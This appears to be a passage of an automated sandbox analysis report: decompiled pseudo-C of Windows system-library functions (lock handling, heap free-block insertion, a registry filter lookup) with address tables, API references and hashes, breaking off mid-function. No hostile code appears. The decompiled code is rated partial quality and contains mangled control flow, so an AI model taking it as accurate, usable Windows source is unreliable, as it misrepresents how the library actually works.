0x00000000
0x6ab63a6f
0x6ab63a0c
0x6abc0002
0x6abc0003
0x6abc0003
0x6abc0008
0x00000000
0x6abc0008
0x6ab639e7
0x6abc0032
0x6abc0036
0x6abc0037
0x00000000
0x00000000
0x6abc0039
0x6abc003c
0x6abc0041
0x00000000
0x6abc0041
0x00000000
0x6ab639e7
0x6ab639aa
0x6ab63ab7
0x00000000

APIs

RtlAcquireSRWLockShared.1105(?,00000000,00000000,00000000), ref: 6AB63986
RtlAcquireSRWLockExclusive.1105(?,?,00000000,00000000,00000000), ref: 6AB639D4
RtlReleaseSRWLockExclusive.1105(?), ref: 6AB639F9
RtlReleaseSRWLockShared.1105(?,?), ref: 6AB63A07
RtlAcquireSRWLockExclusive.1105(?,00000001,00000000,?,?), ref: 6AB63A41
RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,00000001,00000000,?,?), ref: 6AB63A76
RtlReleaseSRWLockShared.1105(?,?,00000000,00000000,00000000), ref: 6AB63AB7

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Lock$ExclusiveRelease$AcquireShared
String ID:
API String ID: 1363392280-0
Opcode ID: 466e3ff88ec262052ad14c58a1a910ea7c8516d12c17e9a17fafc89e3671c37d
Instruction ID: 2378754a587cce3d8e4d3f13b32909a673369d9a05f3f63fd3211703f15e4cb6
Opcode Fuzzy Hash: 466e3ff88ec262052ad14c58a1a910ea7c8516d12c17e9a17fafc89e3671c37d
Instruction Fuzzy Hash: C65168B16017C5AFDB208F69C888A2EF3F9EF45319F11582DE10687612DF74E884EB81

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8A830, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E6AB8A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x6ac58748 - 1;
					if( *0x6ac58748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E6AB6B150();
									_t260 = _t257 + 4;
								} else {
									E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E6AB6B150();
								_t257 = _t260 + 4;
								__eflags =  *0x6ac57bc8;
								if(__eflags == 0) {
									E6AC22073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E6AC2A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E6ABBD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E6AB8AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E6AC2A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E6AC2A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x6ac58748 - 1;
					if( *0x6ac58748 >= 1) {
						_t131 = _t256 + 0x00000fff & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E6AB6B150();
							} else {
								E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E6AB6B150();
							__eflags =  *0x6ac57bc8;
							if(__eflags == 0) {
								_t131 = E6AC22073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x6ab8a83a
0x6ab8a83c
0x6ab8a83e
0x6ab8a841
0x6ab8a844
0x6ab8a84a
0x6ab8aa53
0x6ab8aa59
0x6ab8aa59
0x6ab8a858
0x6ab8a85e
0x6ab8aaf5
0x6ab8aafc
0x6abd229e
0x6abd22a2
0x6abd22a8
0x6abd22b3
0x6abd22b5
0x6abd22bb
0x6abd22c1
0x6abd22c5
0x6abd22e6
0x6abd22eb
0x6abd22f0
0x6abd22c7
0x6abd22dc
0x6abd22e1
0x6abd22e1
0x6abd22f3
0x6abd22f8
0x6abd22fd
0x6abd2300
0x6abd2307
0x6abd230e
0x6abd230e
0x6abd2313
0x6abd2313
0x6abd22b5
0x6abd22a2
0x6ab8aafc
0x6ab8a864
0x6ab8a869
0x6ab8aa5c
0x6ab8aa5e
0x6ab8a86f
0x6ab8a87f
0x6ab8a885
0x6ab8a885
0x6ab8a88b
0x6ab8a890
0x6ab8a896
0x6ab8ab0c
0x6ab8ab0f
0x6ab8ab15
0x6abd2320
0x6abd2320
0x6ab8ab1b
0x6ab8a89c
0x6ab8a89f
0x6ab8a8a2
0x6ab8a8a2
0x6ab8a8a5
0x6ab8a8af
0x6ab8a8b3
0x6ab8a8b8
0x6ab8aa66
0x6ab8a8be
0x6ab8a8c5
0x6ab8a8c6
0x6ab8a8ce
0x6abd2328
0x6abd2332
0x6abd2337
0x6abd2337
0x6ab8a8ce
0x6ab8a8d4
0x6ab8a8d8
0x6ab8a8db
0x6ab8a8de
0x6ab8a8e1
0x6ab8a8e5
0x6ab8a8e8
0x6ab8a8f0
0x6ab8a8f3
0x6abd234c
0x6abd2350
0x6abd2355
0x6abd2359
0x6abd2359
0x6ab8a8f9
0x6ab8a901
0x6ab8aae4
0x6ab8aae4
0x6ab8aaea
0x00000000
0x6ab8a907
0x6ab8a90a
0x6ab8a91d
0x6ab8a91d
0x00000000
0x6ab8a910
0x6ab8a910
0x6ab8a910
0x6ab8a914
0x6ab8a924
0x6ab8a924
0x6ab8a924
0x6ab8a924
0x6ab8a916
0x6ab8a91b
0x00000000
0x00000000
0x00000000
0x6ab8a91b
0x6ab8a925
0x6ab8a925
0x6ab8a932
0x6ab8a936
0x6ab8a93c
0x6ab8a93c
0x6ab8a93c
0x6ab8ab22
0x6ab8ab24
0x6ab8ab27
0x6ab8ab27
0x6ab8a942
0x6ab8a944
0x6ab8aaba
0x6ab8aabd
0x6ab8aac0
0x6ab8aac0
0x6ab8aac2
0x6ab8ab2f
0x6ab8aac4
0x6ab8aac4
0x6ab8aac7
0x6ab8aaca
0x6ab8aacc
0x6ab8aace
0x6ab8aace
0x6ab8aace
0x6ab8aad1
0x6ab8aad1
0x6ab8aad7
0x6ab8aad9
0x00000000
0x00000000
0x6abd2361
0x6abd2369
0x6abd236b
0x00000000
0x6abd2371
0x00000000
0x6abd2371
0x00000000
0x6abd236b
0x6ab8aac0
0x6ab8a94a
0x6ab8a94a
0x6ab8a94d
0x6ab8a94d
0x6ab8a950
0x6ab8a954
0x6abd2376
0x6abd2380
0x6ab8a95a
0x6ab8a95a
0x6ab8a95c
0x6ab8a95f
0x6ab8a961
0x6ab8a961
0x6ab8a967
0x6ab8a96a
0x6ab8a972
0x6ab8aa02
0x6ab8aa06
0x6ab8aa10
0x6ab8aa16
0x6ab8aa16
0x6ab8aa1b
0x6ab8aa21
0x6ab8aa24
0x6ab8aa27
0x6ab8aa29
0x6ab8aa2c
0x6ab8aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab8a978
0x6ab8a978
0x6ab8a97b
0x6ab8a981
0x6ab8a996
0x6ab8a998
0x6ab8a99f
0x6ab8a9a2
0x6abd238a
0x6ab8a9a8
0x6ab8a9a8
0x6ab8a9a8
0x6ab8a9aa
0x6ab8a9ad
0x6ab8a9b0
0x6ab8a9bb
0x6ab8a9be
0x6ab8a9c7
0x6ab8a9c9
0x6ab8a9c9
0x6ab8a9cc
0x6ab8a9d1
0x6ab8aa6d
0x6ab8aa70
0x6ab8aa73
0x6ab8aa75
0x6ab8aa79
0x6ab8aa7e
0x6ab8aa82
0x6ab8aa8f
0x6ab8aa94
0x6ab8aa96
0x6abd2392
0x6abd23a1
0x6abd23a1
0x6ab8aa9c
0x6ab8aa9f
0x6ab8aaa2
0x6ab8aaa2
0x6ab8aaa8
0x6ab8aaab
0x6ab8aaaf
0x00000000
0x6ab8aab5
0x00000000
0x6ab8aab5
0x6ab8a9d7
0x6ab8a9d7
0x6ab8a9da
0x6ab8a9e0
0x6ab8a9e3
0x6ab8a9e6
0x6ab8a9e9
0x6ab8a9eb
0x6ab8a9fd
0x6ab8a9fd
0x00000000
0x6ab8a9eb
0x00000000
0x00000000
0x00000000
0x6ab8a983
0x6ab8a983
0x6ab8a983
0x6ab8a987
0x6ab8a995
0x6ab8a995
0x6ab8a995
0x6ab8a995
0x6ab8a989
0x6ab8a98e
0x00000000
0x6ab8a990
0x00000000
0x6ab8a990
0x6ab8a98e
0x00000000
0x6ab8a983
0x6ab8a972
0x6ab8a90a
0x6ab8aa34
0x6ab8aa34
0x6ab8aa40
0x6ab8aa43
0x6ab8aa46
0x6ab8aa4d
0x6abd23ab
0x6abd23b2
0x6abd23be
0x6abd23c3
0x6abd23c5
0x6abd23cb
0x6abd23d1
0x6abd23d5
0x6abd23f6
0x6abd23fb
0x6abd23d7
0x6abd23ec
0x6abd23f1
0x6abd2403
0x6abd2408
0x6abd2410
0x6abd2417
0x6abd2422
0x6abd2422
0x6abd2417
0x6abd23c5
0x6abd23b2
0x00000000

APIs

DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000018,?,?,?,?,?,?,?,?,?,6AB8A3D0,?,?,-00000018), ref: 6ABD22DC
DbgPrint.1105(((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)),?,?,?,?,?,?,?,?,6AB8A3D0,?,?,-00000018,?), ref: 6ABD22F8

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 6ABD22F3
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 6ABD2403
HEAP[%wZ]: , xrefs: 6ABD22D7, 6ABD23E7
HEAP: , xrefs: 6ABD22E6, 6ABD23F6

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 3558298466-1657114761
Opcode ID: b8710e48dece95770531a293786ea0c312664152b441a0c37697ebefd163bd77
Instruction ID: fbb0bb0e75cd89f3d654c01e4412f7214266c4824f57cc61eb64023cbce294bd
Opcode Fuzzy Hash: b8710e48dece95770531a293786ea0c312664152b441a0c37697ebefd163bd77
Instruction Fuzzy Hash: B1D1ADB4A046859FDB18CF6CC490BAAB7F1FF49304F16816DE8559B682EB34E841EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA0F48, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 188
nativeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ABA0F48(signed short* __ecx, long* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed short* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed short _v36;
				signed int _v40;
				long* _v48;
				char _v52;
				char _v56;
				char _v57;
				char _v58;
				intOrPtr _v60;
				void* _v64;
				void* _t60;
				void* _t66;
				void* _t69;
				void* _t72;
				intOrPtr _t87;
				char _t93;
				signed int* _t95;
				intOrPtr _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t107;
				signed short _t109;
				char _t110;
				intOrPtr _t111;
				intOrPtr* _t114;
				intOrPtr _t116;
				void* _t117;
				signed int _t118;
				void* _t120;

				_t120 = (_t118 & 0xfffffff8) - 0x3c;
				_v48 = __edx;
				_t87 = _a4;
				 *_a8 = 0;
				_t107 =  *__ecx & 0x0000ffff;
				_v52 = 0;
				_v56 = 0;
				_v57 = 0;
				_t101 = _t107;
				_t114 = __ecx[2] + _t101;
				_v40 = __ecx;
				if(_t87 != 0) {
					if(_t101 + 2 > (__ecx[1] & 0x0000ffff)) {
						L28:
						_t60 = 0xc000000d;
						goto L16;
					}
					_t93 = 0;
					if( *_t114 == 0) {
						goto L2;
					}
					goto L28;
				} else {
					_t93 = 0;
					L2:
					if(_t101 == 0) {
						L7:
						_t109 = _t107 - _t101;
						_v32 = _t114;
						_v36 = _t109;
						if((_t109 & 0x0000ffff) != _t109) {
							_t60 = 0xc0000023;
							L16:
							return _t60;
						}
						if(_t87 != 0) {
							_t116 = _v48;
							_v58 = 1;
							_t60 = E6ABA10D7( &_v52, _t116, _t87);
						} else {
							_v58 = _t93;
							_t60 = E6ABA108B( &_v52);
							_t116 = _v48;
						}
						if(_t60 < 0) {
							goto L16;
						} else {
							_t110 = _v52;
							_v20 =  &_v36;
							_v28 = 0x18;
							_v24 = _t110;
							_v16 = 0x240;
							_v12 = 0;
							_v8 = 0;
							if(_t87 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push( &_v28);
								_push(_t116);
								_push( &_v56);
								_t66 = E6ABA96D0();
							} else {
								_push( &_v28);
								_push(_t116);
								_push( &_v56);
								_t66 = E6ABA9600();
							}
							_t117 = _t66;
							if(_v58 != 0) {
								_push(_t110);
								E6ABA95D0();
							}
							if(_t117 >= 0) {
								_t95 =  &_v52;
								_v52 = _v56;
								_t69 = E6AB68239(_t95, _v48, _v40);
								_t111 = _v56;
								_t117 = _t69;
								if(_t117 < 0) {
									L24:
									if(_t111 != 0) {
										_push(_t111);
										E6ABA95D0();
									}
									goto L15;
								}
								_t104 = _v56;
								if(_v57 != 0 && _t111 == _t104 && _t87 != 0) {
									_push(_t95);
									_v52 = 0;
									_t72 = E6ABF8372( &_v52, _t104, _v48);
									_t111 = _v60;
									_t117 = _t72;
									if(_t117 >= 0) {
										_t117 = E6AB76D30( &_v52, L"FilterFullPath");
										if(_t117 >= 0) {
											_t97 =  *((intOrPtr*)(_t120 + 0x24));
											_push( *(_t97 + 2) & 0x0000ffff);
											_push( *((intOrPtr*)(_t97 + 4)));
											_push(1);
											_push(0);
											_push( &_v52);
											_push(_t111);
											_t117 = E6ABA9B00();
											if(_t117 >= 0) {
												 *((intOrPtr*)(_t120 + 0x28)) = 1;
												_t117 = E6AB76D30( &_v52, L"UseFilter");
												if(_t117 >= 0) {
													_push(4);
													_push(_t120 + 0x28);
													_push(4);
													_push(0);
													_push( &_v52);
													_push(_v60);
													_t117 = E6ABA9B00();
												}
											}
										}
									}
									_push(_v60);
									E6ABA95D0();
								}
								if(_t117 < 0) {
									goto L24;
								} else {
									 *_a8 = _t111;
									goto L15;
								}
							} else {
								L15:
								_t60 = _t117;
								goto L16;
							}
						}
					}
					L3:
					L3:
					if( *((short*)(_t114 - 2)) == 0x5c) {
						_v57 = 1;
					} else {
						goto L4;
					}
					goto L7;
					L4:
					_t114 = _t114 + 0xfffffffe;
					_t101 = _t101;
					if(_t101 != 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
			}

0x6aba0f50
0x6aba0f55
0x6aba0f5f
0x6aba0f63
0x6aba0f69
0x6aba0f6c
0x6aba0f70
0x6aba0f74
0x6aba0f78
0x6aba0f7a
0x6aba0f7c
0x6aba0f82
0x6abdcc82
0x6abdcc8f
0x6abdcc8f
0x00000000
0x6abdcc8f
0x6abdcc84
0x6abdcc89
0x00000000
0x00000000
0x00000000
0x6aba0f88
0x6aba0f88
0x6aba0f8a
0x6aba0f8c
0x6aba0fa5
0x6aba0fa5
0x6aba0fa7
0x6aba0fae
0x6aba0fb5
0x6abdcc99
0x6aba1029
0x6aba102f
0x6aba102f
0x6aba0fbd
0x6abdcca3
0x6abdccae
0x6abdccb3
0x6aba0fc3
0x6aba0fc3
0x6aba0fcb
0x6aba0fd0
0x6aba0fd0
0x6aba0fd6
0x00000000
0x6aba0fd8
0x6aba0fd8
0x6aba0fe0
0x6aba0fe6
0x6aba0fee
0x6aba0ff2
0x6aba0ffa
0x6aba0ffe
0x6aba1004
0x6abdccbd
0x6abdccbe
0x6abdccbf
0x6abdccc0
0x6abdccc5
0x6abdccc6
0x6abdcccb
0x6abdcccc
0x6aba100a
0x6aba100e
0x6aba100f
0x6aba1014
0x6aba1015
0x6aba1015
0x6aba101f
0x6aba1021
0x6aba1077
0x6aba1078
0x6aba1078
0x6aba1025
0x6aba1036
0x6aba1042
0x6aba1046
0x6aba104b
0x6aba104f
0x6aba1053
0x6aba107f
0x6aba1081
0x6aba1083
0x6aba1084
0x6aba1084
0x00000000
0x6aba1081
0x6aba105a
0x6aba105e
0x6abdccd6
0x6abdcce1
0x6abdcce5
0x6abdccea
0x6abdccee
0x6abdccf2
0x6abdcd03
0x6abdcd07
0x6abdcd09
0x6abdcd11
0x6abdcd12
0x6abdcd19
0x6abdcd1b
0x6abdcd1c
0x6abdcd1d
0x6abdcd23
0x6abdcd27
0x6abdcd32
0x6abdcd40
0x6abdcd44
0x6abdcd46
0x6abdcd4c
0x6abdcd4d
0x6abdcd4f
0x6abdcd54
0x6abdcd55
0x6abdcd5e
0x6abdcd5e
0x6abdcd44
0x6abdcd27
0x6abdcd07
0x6abdcd60
0x6abdcd64
0x6abdcd64
0x6aba106e
0x00000000
0x6aba1070
0x6aba1073
0x00000000
0x6aba1073
0x6aba1027
0x6aba1027
0x6aba1027
0x00000000
0x6aba1027
0x6aba1025
0x6aba0fd6
0x00000000
0x6aba0f8e
0x6aba0f93
0x6aba0fa0
0x00000000
0x00000000
0x00000000
0x00000000
0x6aba0f95
0x6aba0f95
0x6aba0f99
0x6aba0f9c
0x00000000
0x6aba0f9e
0x00000000
0x6aba0f9e
0x6aba0f9c

APIs

ZwOpenKey.1105(?,?,00000018), ref: 6ABA1015
ZwClose.1105(?,?,?,00000018), ref: 6ABA1078
ZwClose.1105(?,?,?,?,?,00000018), ref: 6ABA1084

Strings

UseFilter, xrefs: 6ABDCD29
FilterFullPath, xrefs: 6ABDCCF4

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Open
String ID: FilterFullPath$UseFilter
API String ID: 2976201327-4106802152
Opcode ID: 6148541545fa4e147ae84384143259646f11533121a9708ba7cff6d457ab15d6
Instruction ID: 933a4b7f75b91e9c5e373f51fdcf4e5fdc86655c26925ee35bcad692c5d87f4a
Opcode Fuzzy Hash: 6148541545fa4e147ae84384143259646f11533121a9708ba7cff6d457ab15d6
Instruction Fuzzy Hash: 7C61E27194D7C19BD320CF24D440A5FBBE8EF8A718F0A491DFAC497210EB31D909A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6ABE3540, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 130
nativememoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E6ABE3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				char _v352;
				void _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				void _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				void* _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x6ac5d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E6ABA0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E6ABE3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						memset( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E6ABE3540;
						memset( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E6ABBDDD0( &_v1072, _t75, _t79, _t80, _t81);
